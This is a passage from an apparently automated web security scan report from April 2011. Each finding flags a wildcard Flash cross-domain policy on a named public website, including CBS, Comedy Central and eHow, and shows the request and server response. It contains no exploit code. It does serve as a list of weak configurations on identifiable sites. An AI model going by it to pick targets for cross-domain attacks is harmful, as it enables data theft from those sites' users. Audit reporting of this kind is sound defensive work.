SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-fro
...[SNIP]...
<allow-access-from domain="wwwimage.cbs.com" />
<allow-access-from domain="cbs.com" />
<allow-access-from domain="cgi.cbs.com" />
<allow-access-from domain="video.cgi.cbs.com" />
<allow-access-from domain="dev.cgi.cbs.com" />
<allow-access-from domain="dev.cbs.cbsig.net" />
<allow-access-from domain="www.cbsnews.com" />
<allow-access-from domain="wwwimage.cbsnews.com" />
<allow-access-from domain="cbsnews.com" />
<allow-access-from domain="cgi.cbsnews.com" />
<allow-access-from domain="video.cgi.cbsnews.com" />
<allow-access-from domain="*.cbs.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.cbs.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cbsnews.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.cbsnews.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.sportsline.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.sportsline.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.sportsline.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="data.panachetech.com" />
<allow-access-from domain="data15.panachetech.com" />
<allow-access-from domain="*.panachetech.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="vsallaccess.com" />
<allow-access-from domain="www.vsallaccess.com" />
<allow-access-from domain="*.vsallaccess.com" />
<allow-access-from domain="cbsstatic.dev.drt.cbsig.net" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="stage.drt.cbsig.net" />
<allow-access-from domain="*.broccolobster.com" />
...[SNIP]...

7.34. http://www.cbsinteractive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbsinteractive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cbsinteractive.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:53 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 80
Keep-Alive: timeout=15, max=1000
Connection: Keep-Alive
Content-Type: application/xml

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.35. http://www.cbssports.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbssports.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cbssports.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:08 GMT
Server: Apache
Last-Modified: Sun, 27 Feb 2011 21:03:46 GMT
Accept-Ranges: bytes
Content-Length: 2798
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:25:08 GMT
X-Media: ws1373-fe.tm
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-access-from domain="sportsline.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sportsline.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.sportsline.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cbssports.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbssports.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.cbssports.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cbsimg.net" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbsimg.net" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cbsgames.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbsgames.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.cbsgames.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cbsnews.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbsnews.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.cbsnews.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ncaa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ncaa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.ncaa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="maxpreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.maxpreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.maxpreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="trupreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.trupreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.trupreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cbsig.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbsig.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.cbsig.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.akamai.net" />
<allow-access-from domain="*.g.akamai.net" />
<allow-access-from domain="beyond.download.akamai.com" />
<allow-access-from domain="cbssports.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbssports.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cp32822.edgefcs.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="doubleclick.net" />
<allow-access-from domain="*.*.doubleclick.net"/>
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.*.2mdn.net" />
<allow-access-from domain="sandbox.dartmotif.com" />
<allow-access-from domain="my.22squared.com" />
...[SNIP]...

7.36. http://www.clear-request.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clear-request.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.clear-request.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:15 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 15 Jan 2009 16:15:53 GMT
ETag: "4b90d7-cc-c5400040"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.37. http://www.cmt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cmt.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Thu, 14 Aug 2008 20:11:47 GMT
ETag: "1c4250f-121-454711d5526c0"
Accept-Ranges: bytes
Content-Length: 289
Content-Type: application/xml
Cache-Control: max-age=600
Date: Sat, 02 Apr 2011 13:38:06 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

7.38. http://www.colbertnation.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.colbertnation.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.colbertnation.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.1
Last-Modified: Wed, 13 Aug 2008 14:31:05 GMT
ETag: "160c686-102-454583d0d9c40"
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Cache-Control: max-age=386
Expires: Sat, 02 Apr 2011 14:25:35 GMT
Date: Sat, 02 Apr 2011 14:19:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-hea
...[SNIP]...

7.39. http://www.collegehumor.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.collegehumor.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:38 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 00:02:39 GMT
ETag: "9c073-235-49ea2612be5c0"
Accept-Ranges: bytes
Content-Length: 565
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="www.collegehumor.com" />
...[SNIP]...
<allow-access-from domain="dev.collegehumor.com" />
   <allow-access-from domain="staging.collegehumor.com" />
   <allow-access-from domain="collegehumor.com" />
   <allow-access-from domain="*.collegehumor.com" />
   <allow-access-from domain="*.cvcdn.com" />
   <allow-access-from domain="*" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.40. http://www.comedycentral.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comedycentral.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.comedycentral.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 258
Content-Type: text/xml
Last-Modified: Tue, 15 Apr 2008 20:09:33 GMT
ETag: "102-48050b7d"
Accept-Ranges: bytes
Cache-Control: max-age=72
Expires: Sat, 02 Apr 2011 13:38:15 GMT
Date: Sat, 02 Apr 2011 13:37:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-hea
...[SNIP]...

7.41. http://www.contactatonce.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.contactatonce.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.contactatonce.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:56 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 27 Jun 2010 23:26:28 GMT
ETag: "cb-48a0b5558d100"
Accept-Ranges: bytes
Content-Length: 203
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Sat, 09 Apr 2011 13:45:56 GMT
Vary: Accept-Encoding,User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.42. http://www.cracked.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cracked.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cracked.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.6
Last-Modified: Tue, 14 Jul 2009 21:42:53 GMT
ETag: "bf8fd0-6c-46eb15220f140"-gzip
Content-Type: application/xml
Expires: Sat, 02 Apr 2011 13:33:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:33:14 GMT
Content-Length: 108
Connection: close
Set-Cookie: BIGipServerorigin.cracked.com=1083574538.20480.0000; path=/

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>


7.43. http://www.crackle.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.crackle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.crackle.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 25 Feb 2011 01:20:08 GMT
Accept-Ranges: bytes
ETag: "32a0dd238ad4cb1:f88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Connection: close
Date: Sat, 02 Apr 2011 13:44:15 GMT
Age: 15631
Content-Length: 126

...<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


7.44. http://www.craveonline.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.craveonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.craveonline.com

Response

HTTP/1.1 200 OK
Server: Apache/2
Vary: Accept-Encoding
X-Served-By: app1v-fe.sb.lax2
Content-Type: text/xml
Content-Length: 260
Date: Sat, 02 Apr 2011 14:19:13 GMT
X-Varnish: 732507065
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS from pxy1v.sb.lax2

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.gorillanation.com --> <cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.45. http://www.curse.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.curse.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.curse.com

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServer=1932476484.20480.0000; path=/
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 00:25:04 GMT
Accept-Ranges: bytes
ETag: "070209a1fd5ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:39:41 GMT
Xonnection: Xeep-alive
Content-Length: 332

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-pol
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.46. http://www.daylife.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.daylife.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.daylife.com

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Content-Length: 140
Date: Sat, 02 Apr 2011 14:19:13 GMT
X-Varnish: 3945368514
Age: 0
Via: 1.1 varnish
Connection: close


<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.47. http://www.degrees.info/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.degrees.info
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.degrees.info

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:34 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Wed, 16 Mar 2011 14:47:14 GMT
ETag: "52c1-db-49e9a9ed8c080"
Accept-Ranges: bytes
Content-Length: 219
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="true" />
</cro
...[SNIP]...

7.48. http://www.docstoc.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.docstoc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.docstoc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 22 Oct 2010 18:22:44 GMT
Accept-Ranges: bytes
ETag: "b44c91e1672cb1:0"
serverID: web02
Date: Sat, 02 Apr 2011 13:30:53 GMT
Connection: keep-alive
Content-Length: 151

<cross-domain-policy>
   <allow-access-from domain="docstoc.com" to-ports="*" />
   <allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>

7.49. http://www.doctoroz.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.doctoroz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.doctoroz.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml; charset=utf-8
ETag: "4e5a-c9-4711fc791f940"
Last-Modified: Fri, 14 Aug 2009 20:20:13 GMT
Server: Apache
Cache-Control: max-age=3600
Date: Sat, 02 Apr 2011 13:40:44 GMT
Content-Length: 201
Connection: close
X-N: S

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>
...[SNIP]...

7.50. http://www.ebaumsworld.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebaumsworld.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ebaumsworld.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:31 GMT
Server: Apache/2.2.17 (EL)
Last-Modified: Mon, 02 Feb 2009 22:06:45 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" to-ports="*" />
</cross-do
...[SNIP]...

7.51. http://www.education.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.education.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.education.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:34:11 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Mon, 28 Feb 2011 18:40:05 GMT
Connection: close
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.52. http://www.ehow.co.uk/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ehow.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ehow.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 01 Apr 2011 02:54:34 GMT
Content-Type: text/xml
Date: Sat, 02 Apr 2011 14:00:19 GMT
Content-Length: 117
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.53. http://www.eventful.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.eventful.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.eventful.com

Response

HTTP/1.0 200 OK
Connection: close
Expires: Sat, 16 Apr 2011 13:35:52 GMT
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1641692581"
Last-Modified: Wed, 10 Feb 2010 18:55:07 GMT
Content-Length: 201
Date: Sat, 02 Apr 2011 13:35:52 GMT
Server: lighttpd

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.54. http://www.everydayhealth.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.everydayhealth.com

Response

HTTP/1.1 200 OK
Content-Length: 369
Content-Type: text/xml
Last-Modified: Fri, 17 Dec 2010 22:02:56 GMT
Accept-Ranges: bytes
ETag: "0e8ca28369ecb1:3da6"
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB07
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:17 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!--used for flash slideshows -->
<cross-domain-policy>
   <site-control permi
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.55. http://www.evtv1.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.evtv1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.evtv1.com

Response

HTTP/1.1 200 OK
Content-Length: 216
Content-Type: text/xml
Last-Modified: Tue, 03 Mar 2009 14:07:08 GMT
Accept-Ranges: bytes
ETag: "2ed3e15699cc91:1433"
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR PSAi PSDi OUR BUS UNI COM NAV INT STA OTC'
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:53:45 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-
...[SNIP]...

7.56. http://www.ew.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ew.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ew.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:12 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...

7.57. http://www.ez-tracks.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ez-tracks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ez-tracks.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 14:14:23 GMT
Content-Length: 208
Content-Type: text/xml
Content-Location: http://www.ez-tracks.com/crossdomain.xml
Last-Modified: Wed, 01 Dec 2004 14:18:24 GMT
Accept-Ranges: bytes
ETag: "12a73b9eb0d7c41:cb57"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

